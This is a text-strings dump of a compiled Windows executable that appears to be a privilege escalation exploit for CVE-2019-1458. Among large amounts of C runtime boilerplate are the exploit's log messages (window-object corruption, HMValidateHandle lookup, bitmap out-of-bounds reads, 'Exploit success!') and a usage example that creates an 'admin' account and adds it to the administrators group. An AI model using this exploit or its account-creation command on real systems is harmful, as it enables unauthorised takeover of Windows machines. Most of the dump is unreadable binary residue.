!This program cannot be run in DOS mode.
d0Pva1
v`1Dva1
va1Rich
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
@USVWH
L+D$xH
wwwwwwwwH
L$ SVWH
L$ SVWH
H9D$Hr
H9D$Hs
$Hc@<H
D$ H9D$(u
5Genu
5Auth
D$ Hc@<H
H3D$0H
H9D$ u
D$pHc@
D$8HcD$ H
L$@HcI
D$pHc@
D$0Hc@
L$8HcD
H;D$Ht
9D$ s(
L$8HcD
D$,9D$
@XH9D$@s
@XH9D$@u
D$ H9D$@u
D$(Hc@
L$(HcI
D$(Hc@
|$ RCC
|$ MOC
|$ csm
H9D$Xrd
H9D$XsL
H9D$Xu
D$8H9D$0u
H9D$0u
D$@Hc@
D$@Hc@
D$PHc@
D$PHc@
D$PHc@
D$@Hc@
D$$9D$ sAH
D$@Hc@
H9D$Ps
D$@Hc@
D$pHc@
L$xHcI
L$xHcI
L$xH9A
L$`HcI
L$`HcI
L$pHcI
L$pHcI
L$pHcI
L$xHcI
H9D$8tl
L$xHcI
L$pHcI
D$xHc@
I(H9H(u
HcL$ HcD
HcL$ HcD
9D$ ~/D
L$hHcI
HcL$$Hk
L$PHcI
HcL$ Hk
L$PHcI
HcL$ Hk
L$@HcI H
H9D$(r
H9D$(v
D$HH9D$ t"H
H9D$8u
H9D$@t:H
D$0H9D$Ht:H
D$0H9D$Ht:H
ffffff
fffffff
H9D$H~
HcD$4Hk
HcD$4Hk
HcL$4H
HcD$4Hk
t7HcD$ H
HcD$ H
H9D$Xs
H9D$hs
H9D$xs
H9D$Xs
H9D$hs
H9D$xs
H9D$pt
|:HcD$0H;
H9D$pu
H9D$puDH
H9D$pt
|:HcD$0H;
H9D$pu
H9D$puA3
H9D$Ps
H9D$`s
H9D$Xv
H9D$(w
?H9D$Xv
H9D$(w
D$P9D$ }"L
D$P9D$ }&f
D$P9D$ }"L
D$P9D$ }&f
H9D$(s
H9D$(s
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
|$ t@
|$ #tJ
|$ +t!
|$ 0tF
HcD$0H
HcD$0H
HcD$0H
HcD$0H
HcD$DH
HcD$DH
HcD$DH
HcD$DH
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
D$`Hc@(H
HcD$$H
HcD$$H
(HcD$8H
D$H9D$ }DH
@P9D$4
@P9D$4
@P9D$4
HcD$8H
@P9D$4
HcD$8H
D$(HcD$`H9D$(s
HcD$`H
+HcD$`H9D$ t
D$(HcD$`H9D$(s
HcD$`H
+HcD$`H9D$ t
HcD$`H
D$(H9D$ tZH
HcD$`H
D$(H9D$ t\H
D$ i@(
H9D$0u
D$HH9D$0
#D$H;D$Hu
D$$9D$ t
D$ Hc@<H
HcD$LH
HcD$LH
D$L9D$P}eHcD$PH
H9D$Xs
H9D$xs
8 u3E3
D$XH9D$@t
H9D$pr
H9D$xr
H+D$@H;D$8w
x ATAVAWH
0A_A^A\
x ATAVAWH
fA94@u
fA94nu
0A_A^A\
D$`H9D$H
D$PH9D$@rf
D$`H9D$ht
D$0H9D$(r
D$0H9D$(s
D$@H9D$`u
D$HH9D$ht(H
H9D$ t
D$`H9D$0t!H
D$HH9D$ t'H
D$XH9D$(t8H
H9D$ t
D$`H9D$@
D$ H9D$8s
D$,HcD$,H
D$ HcD$,H
D$8H9D$ t"
D$XH9D$H
D$@HkL$H
D$XH9D$Ht:H
D$XH9D$Ht
D$HH9D$@u4H
t$@H;D$Hs
HcL$0H
t$hH;D$ps
D$0H9D$8s*H
H9D$hs
H9D$xs
D$P9D$8r
D$P9D$8u
D$\9D$@v
D$X9D$<r
D$X9D$<u
D$d9D$Hv
D$HH9D$ t"H
H9D$8u
H9D$@t:H
D$0H9D$Ht:H
D$0H9D$Ht:H
D$8H9D$(t
D$8H9D$ t<H
HcD$ H
HcD$ H
t'HcD$ H
D$$HcD$ H
HcD$ H
D$@HcD$(H
D$$9D$
HcD$$H
H+D$PH
D$@H9D$8t
H+D$HH
D$@H9D$8t
H+D$PH
D$@H9D$8t
D$(H9D$ u
H9D$ u
H#D$ H
D$pH9D$`tAH
|$hd|IH
H+D$pH
HcL$DH
HcT$HH
HcD$HH
HcL$PH
|$8d|4
HcL$0H
9D$0ucH
HcD$0H
HcL$4H
HcD$<L
HcD$HH
9D$D|QH
H9D$xs
H9D$xv
HcL$HH
HcD$TH
D$49D$0}-
H9D$0u
H9D$0u
H9D$8s
D$HH9D$8
D$@9D$Dv
D$@9D$Ds.
(HcD$0Hk
(HcD$0Hk
XHcD$`H
D$p9D$@|:H
D$xHcD$xH
D$@9D$X}C
HcL$XHcT$X
D$x9D$\}&HcD$\
D$@9D$l}7
HcD$hL
HcD$@H
D$`HcD$`H;
}OHcD$`
HcD$|H;
HcD$hL
D$dHcD$dH;
}EHcD$d
HcT$dH
D$0H9D$(
D$PH9D$H
D$XH9D$8siH
D$PH9D$Hs]H
D$@9D$Ds!H
D$PH9D$H
D$XH9D$8stH
D$PH9D$HshH
D$@9D$Ds!H
D$pH9D$X
D$xH9D$HsiH
D$pH9D$Xs]H
D$P9D$D
XHcD$`H
D$09D$<t:H
D$09D$<t:H
D$0H9D$Hu
ATAUAWH
L!|$ A
A_A]A\
WATAUAVAWH
0A_A^A]A\_
UWATAVAWH
t(Lc}oH;
A_A^A\_]
t$ WATAUAVAWH
0A_A^A]A\_
@USVWATAUAVAWH
xA_A^A]A\_^[]
H9D$8v H
H9D$`t
H9D$Hv
H9D$8t2H
H9D$8t L
H9D$pu(
H9D$ t
H9D$@v
H9D$8v H
t$HiD$
t$HiD$
|$PArO
|$PZwH
|$ParO
|$PzwH
H9D$ thH
H9D$ t
9D$ w@
9D$ w(
D$hH9D$X
D$hH9D$Xr
H9D$hs
H9D$xs
fD94Fu
WATAUAVAWH
9t$htBH95m
x}I96txI
0A_A^A]A\_
WATAUAVAWH
fB94`t
x~I96tyI
fC94wu
0A_A^A]A\_
WAVAWH
0A_A^_
D$XH9D$Pu
D$XH9D$ t0H
D$XH9D$ u
D$PH9D$ t7H
D$HH9D$@u
D$@H9D$ t+H
HcD$4H
H9D$ht
H9D$ps
H9D$ps
D$XH9D$8
D$0HcD$0H
HcD$0H
D$0H9D$ t
9D$`|XH
HHcD$PH
H9D$ t
HcD$0H
t>HcD$0H
HcD$0H
HcD$ Hk
T$@H9L
(t/HcD$ Hk
HcD$ Hk
HcD$ Hk
t/HcD$ Hk
HcD$ Hk
HcD$0Hk
T$PH9L
(tmHcD$0Hk
HcD$0Hk
HcD$0Hk
HcD$0Hk
HcD$0Hk
ufHcD$0Hk
HcD$0Hk
HcD$0Hk
tQHcD$0Hk
HcD$0Hk
HcD$0Hk
H9D$0u
HcD$ Hk
T$@H9L
(t/HcD$ Hk
HcD$ Hk
HcD$ Hk
t/HcD$ Hk
HcD$ Hk
D$HH9D$ u
H9D$ t
D$XH9D$Pw
|$\Pta
D$$9D$(
D$ HcD$ Hk
HcD$ Hk
HcD$ H=
HcD$ Hk
9D$xr:H
D$hH9D$@u
D$89D$lv
D$p9D$<}
HcL$<H
HcL$<H
;D$8w#
H9D$`v8
D$49D$H
D$49D$Xsx
D$H9D$,
D$L9D$4t]
|$$stV
|$$stb
|$$su!H
|$0sv$H
D$(9D$,t
D$49D$8u
D$49D$8u
D$@H9D$Hu
HHcD$PH
XHcD$`H
H9D$ps
UVWATAUAVAWH
$u-E8n
:u A8N
pA_A^A]A\_^]
t$ WATAUAVAWH
0A_A^A]A\_
D$`H9D$h
D$hH9D$(w/H
D$(H9D$ t`H
D$HH9D$@vPH
D$@H9D$Hs,H
D$HH9D$@wPH
D$XH9D$Hw,H
D$@H9D$8v,H
D$HH9D$8s
D$8H9D$@u
D$8H9D$@sPH
D$@H9D$8v,H
D$8H9D$@rPH
D$PH9D$8v,H
D$8H9D$Ps.HcD$0H
HcD$0H
D$XH9D$Hs
D$XH9D$Hs.HcD$0H
HcD$0H
D$8H9D$Ps
HcD$0H
D$PHcD$0H
HcD$TH
tAHcD$TH
9D$P~!
D$`HcD$`H
tAHcD$`H
H9D$Ps
D$HH9D$Xr
H9D$Ps
D$HH9D$Xr
H9D$Xs
HcD$@H9
H9D$Xs
HcD$@H9
H9D$hs
H9D$0w
XHcD$`H
@9D$(s
D$4HcD$4H
ffffff
fffffff
D$0H9D$ t
HcD$(H
@CH9D$0r5H
H9D$0v
?H9D$0sZH
D$ H9D$Pu
f9D$ u
f9D$ u
HcD$\H
tAHcD$\H
HcD$XH
tAHcD$XH
D$49D$8u
D$0Hc@<H
H9D$8r H
H9D$8s
$Hc@<H
:cD$ @
:cD$ @
:cD$ @
D:\agent\_work\10\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
Unknown exception
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp
(null)
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
CorExitProcess
COMSPEC
cmd.exe
minkernel\crts\ucrt\inc\corecrt_internal_traits.h
minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp
minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp
minkernel\crts\ucrt\src\appcrt\startup\onexit.cpp
Normal
Ignore
Client
Client hook allocation failure at file %hs line %d.
Client hook allocation failure.
Error: memory allocation: bad memory block type.
Client hook re-allocation failure at file %hs line %d.
Client hook re-allocation failure.
Error: memory allocation: bad memory block type.
Memory allocated at %hs(%d).
The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()
Error: possible heap corruption at or near 0x%p
The Block at 0x%p was allocated by aligned routines, use _aligned_free()
Client hook free failure.
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
Memory allocated at %hs(%d).
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory before start of heap buffer.
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
Memory allocated at %hs(%d).
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.
CRT detected that the application wrote to memory after end of heap buffer.
DAMAGED
HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.
CRT detected that the application wrote to a heap buffer that was freed.
Memory allocated at %hs(%d).
HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.
CRT detected that the application wrote to a heap buffer that was freed.
%hs located at 0x%p is %Iu bytes long.
Memory allocated at %hs(%d).
%hs located at 0x%p is %Iu bytes long.
Cycle in block list detected while processing block located at 0x%p.
Heap validation failed.
Bad memory block found at 0x%p.
Memory allocated at %hs(%d).
Bad memory block found at 0x%p.
Data: <%s> %s
Dumping objects ->
#File Error#(%d) :
%hs(%d) :
{%ld}
client block at 0x%p, subtype %x, %Iu bytes long.
normal block at 0x%p, %Iu bytes long.
crt block at 0x%p, subtype %x, %Iu bytes long.
Object dump complete.
Detected memory leaks!
<program name unknown>
AreFileApisANSI
CompareStringEx
GetActiveWindow
GetLastActivePopup
GetProcessWindowStation
GetUserObjectInformationW
LCMapStringEx
LocaleNameToLCID
MessageBoxA
MessageBoxW
AppPolicyGetProcessTerminationMethod
AppPolicyGetShowDeveloperDiagnostic
AppPolicyGetWindowingModel
minkernel\crts\ucrt\src\appcrt\internal\per_thread_data.cpp
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
minkernel\crts\ucrt\src\appcrt\stdio\_sftbuf.cpp
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
minkernel\crts\ucrt\src\desktopcrt\exec\spawnv.cpp
minkernel\crts\ucrt\src\desktopcrt\exec\spawnvp.cpp
minkernel\crts\ucrt\inc\corecrt_internal_win32_buffer.h
minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
minkernel\crts\ucrt\src\desktopcrt\env\setenv.cpp
minkernel\crts\ucrt\src\appcrt\lowio\osfinfo.cpp
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
Second Chance Assertion Failed: File
<file unknown>
, Line
_CrtDbgReport: String too long or IO Error
Assertion failed:
Assertion failed!
%s(%d) : %s
_CrtDbgReport: String too long or Invalid characters in String
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
minkernel\crts\ucrt\src\desktopcrt\exec\cenvarg.cpp
minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
UUUUUU
UUUUUU
minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp
minkernel\crts\ucrt\src\appcrt\locale\comparestringa.cpp
=imb;D
/>58d%
VM >cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
IsMenu
gSharedInfo
user32.dll
Failed to load user32
Failed to find location of exported function 'IsMenu' within user32.dll
Failed to find offset of HMValidateHandle from location of 'IsMenu'
MagciHwnd==%p
[!] Failed to locate HmValidateHandle, exiting
NtUserConsoleControl
win32u.dll
NtCallbackReturn
ntdll.dll
CreateWnd
Hwnd:%08x qwfirstEntryDesktop=%p
BaseAddress:%p RegionSize=:%p
Min BaseAddress:%p RegionSize=:%p
realMagicHwnd=%p
dwRet=%p
tagWndMin_offset_0x128=%p
g_qwExpLoit=%p
qwFrist read=%p
qwSecond read=%p
qwFourth read=%p
qwFifth read=%p
qwSixth read=%p
[!] CreateProcessW Failed![%lx]
[+] ProcessCreated with pid %d!
===============================
Usage: %S command
Example: %S "net user admin admin /ad & net user localgroup administrators admin /ad"
[+]hExploitBit Handle address: %p
[+]Peb Pointer address : %p
[+]GdiSharedHandleTable Pointer address: %p
[+]dwExpBitmapObj Lookup address: %p
[+]oob_target address: %p
[-] Ran out of memory allocating Bitmaps
[+] Find hManager = %p
[+] Find hWorker = %p
[+] GetBitMapBits/Reading using oob_target...
TriggerExploit
Creating ExploitWnd
[!] CreateWindowEx error 0x%x!
[*] tagWND: 0x%p
hManager 0x%p
hWorker 0x%p
[!] GetBitmapBits error 0x%x!
CVE-2019-1458 exploit by @unamer(https://github.com/unamer)
Usage: %S command
Example: %S "net user admin admin /ad & net user localgroup administrators admin /ad"
WARNING: YOU ONLY HAVE ONE CHANCE!!!
RtlGetVersion
[!] This version of system was not supported (%d.%d)
[!] Failed to map 0x%p (0x%p), exiting (%llx)
[*] tagWND: 0x%p, tagCLS:0x%p, gap:0x%llx
[*] Registering window
[-] Failed registering SploitWnd window class
[*] Creating instance of this window
[-] Failed to create SploitWnd window
[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window 0x%p
[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced
[*] GetLastError = %x
[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130
[*] Simulating alt key press
[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time
[+] Exploit success!
[!] Exploit fail, test:0x%p,tagWND:0x%p, error:0x%lx
NtAllocateVirtualMemory
SparyClass
SparyClass2
WNDCLASSMAIN
E:\work\
\Exp\x64\Release\ExploitTest.pdb
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
.rsrc$01
.rsrc$02
LoadLibraryW
GetProcAddress
GetModuleHandleW
LoadLibraryA
LocalAlloc
GetModuleHandleA
VirtualProtect
VirtualQuery
GetCurrentProcessId
CreatePipe
GetStartupInfoW
lstrcpyW
CreateProcessW
CloseHandle
GetLastError
ReadFile
ExitProcess
VirtualAlloc
GetCurrentProcess
GetCurrentThreadId
KERNEL32.dll
CreateMenu
DestroyMenu
DefWindowProcW
PostQuitMessage
GetMenuBarInfo
RegisterClassExW
CreatePopupMenu
CreateWindowExW
DestroyWindow
SetWindowLongW
SetWindowLongPtrA
DrawIconEx
SendMessageW
SetClassLongPtrW
InternalGetWindowText
RegisterClassW
SetWindowLongPtrW
GetKeyboardState
SetKeyboardState
UnregisterClassW
CallNextHookEx
RegisterClassExA
CreateWindowExA
SetWindowsHookExW
SetWinEventHook
SetMenuInfo
AppendMenuA
TrackPopupMenuEx
GetMessageW
TranslateMessage
DispatchMessageW
USER32.dll
CreateCompatibleDC
CreateCompatibleBitmap
SelectObject
GetBitmapBits
SetBitmapBits
GDI32.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TerminateProcess
IsProcessorFeaturePresent
IsDebuggerPresent
QueryPerformanceCounter
GetSystemTimeAsFileTime
InitializeSListHead
RtlUnwindEx
SetLastError
EncodePointer
RaiseException
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
RtlPcToFileHeader
GetModuleHandleExW
GetModuleFileNameW
GetStdHandle
WriteFile
GetCommandLineA
GetCommandLineW
HeapAlloc
HeapSize
HeapValidate
GetSystemInfo
CompareStringW
LCMapStringW
GetFileType
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
WideCharToMultiByte
WaitForSingleObject
GetExitCodeProcess
GetFileAttributesExW
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
GetProcessHeap
OutputDebugStringW
SetStdHandle
GetStringTypeW
HeapFree
HeapReAlloc
HeapQueryInformation
WriteConsoleW
GetFileSizeEx
SetFilePointerEx
CreateFileW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
cached_handle == INVALID_HANDLE_VALUE
D:\agent\_work\10\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp
cached_handle == new_handle
cached_fp == invalid_function_sentinel()
cached_fp == new_fp
to->_What == nullptr && to->_DoFree == false
D:\agent\_work\10\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp
ts != nullptr
minkernel\crts\ucrt\src\appcrt\time\time.cpp
common_timespec_get
public_stream != nullptr
( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && !_tm_unicode_safe(fn))))
minkernel\crts\ucrt\inc\corecrt_internal_stdio.h
__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required
stream != nullptr
minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
common_vfprintf
format != nullptr
common_vsprintf
buffer_count == 0 || buffer != nullptr
common_vsprintf_s
buffer != nullptr && buffer_count > 0
("Buffer too small", 0)
common_vsnprintf_s
_format_it != nullptr
minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
("Incorrect format specifier", 0)
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t>,class __crt_stdio_output::standard_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> > >::process
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::process
("N length modifier not specifier", false)
_length == length_modifier::none
state_case_normal_common()
_context != nullptr
__crt_stdio_output::string_output_adapter<wchar_t>::validate
__crt_stdio_output::string_output_adapter<char>::validate
_state == state::normal || _state == state::type
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t>,class __crt_stdio_output::standard_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> > >::state_case_size
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t>,class __crt_stdio_output::standard_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> > >::state_case_normal
_stream.valid()
__crt_stdio_output::stream_output_adapter<wchar_t>::validate
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::state_case_size
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::state_case_normal
__crt_stdio_output::stream_output_adapter<char>::validate
__crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> >::validate_and_update_state_at_end_of_format_string
("'n' format specifier disabled", 0)
("Invalid integer length modifier", 0)
__crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> >::validate_and_update_state_at_end_of_format_string
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t>,class __crt_stdio_output::standard_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> > >::type_case_n
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::type_case_n
(null)
_format_char != '\0'
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t>,class __crt_stdio_output::standard_base<wchar_t,class __crt_stdio_output::stream_output_adapter<wchar_t> > >::type_case_integer
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::type_case_integer
__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard_base<char,class __crt_stdio_output::stream_output_adapter<char> > >::state_case_normal_tchar
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> > >::process
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::process
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> > >::state_case_size
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> > >::state_case_normal
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::state_case_size
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::state_case_normal
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> > >::type_case_n
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::type_case_n
__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::format_validation_base<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t> > >::type_case_integer
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::type_case_integer
__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_validation_base<char,class __crt_stdio_output::string_output_adapter<char> > >::state_case_normal_tchar
string != nullptr
minkernel\crts\ucrt\src\appcrt\stdio\puts.cpp
mscoree.dll
pwcs != nullptr
minkernel\crts\ucrt\src\appcrt\convert\wcstombs.cpp
_wcstombs_l_helper
(dst != nullptr && sizeInBytes > 0) || (dst == nullptr && sizeInBytes == 0)
_wcstombs_s_l
bufferSize <= INT_MAX
sizeInBytes > retsize
minkernel\crts\ucrt\src\desktopcrt\exec\system.cpp
common_system
traits::tdupenv_s_crt(comspec_value.get_address_of(), nullptr, comspec_name)
command[0] != '\0'
pmode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments
minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp
common_configure_argv
minkernel\crts\ucrt\src\desktopcrt\env\environment_initialization.cpp
create_environment
traits::tcscpy_s(variable.get(), required_count, source_it)
minkernel\crts\ucrt\src\appcrt\internal\report_runtime_error.cpp
__acrt_report_runtime_error
wcscpy_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"Runtime Error!\n\nProgram: ")
Runtime Error!
Program:
wcscpy_s(progname, progname_size, L"<program name unknown>")
<program name unknown>
wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)
wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), L"\n\n")
wcscat_s(outmsg, (sizeof(*__countof_helper(outmsg)) + 0), message)
Microsoft Visual C++ Runtime Library
minkernel\crts\ucrt\src\appcrt\lowio\setmode.cpp
(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)
(_osfile(fh) & FOPEN)
("Invalid file descriptor. File possibly closed by a different thread",0)
mode == _O_TEXT || mode == _O_BINARY || mode == _O_WTEXT
_set_fmode
result != nullptr
("Invalid parameter for _configthreadlocale",0)
minkernel\crts\ucrt\src\appcrt\locale\wsetlocale.cpp
_configthreadlocale
mode == 0 || mode == 1
minkernel\crts\ucrt\src\appcrt\heap\new_mode.cpp
_set_new_mode
abort() has been called
_CrtCheckMemory()
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp
_CrtIsValidHeapPointer(block)
old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks
reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
__acrt_last_block == old_head
__acrt_first_block == old_head
block != nullptr
is_block_type_valid(header->_block_use)
header->_line_number == line_number_for_ignore_blocks && header->_request_number == request_number_for_ignore_blocks
header->_block_use == block_use || header->_block_use == _CRT_BLOCK && block_use == _NORMAL_BLOCK
__acrt_last_block == header
__acrt_first_block == header
_msize_dbg
new_bits == _CRTDBG_REPORT_FLAG || new_bits_have_only_valid_flags
_CrtSetDbgFlag
state != nullptr
_CrtMemCheckpoint
print_block_data
(*_errno())
((destination)) != NULL && ((size_in_elements)) > 0
minkernel\crts\ucrt\inc\corecrt_internal_string_templates.h
common_tcscpy_s
(((source))) != NULL
Buffer is too small
(L"Buffer is too small" && 0)
Warning
Assertion Failed
For information on how your program can cause an assertion
failure, see the Visual C++ documentation on asserts.
Debug %ls!
Program: %hs%ls%ls%hs%ls%hs%ls%hs%ls%ls%hs%ls
(Press Retry to debug the application)
Debug %ls!
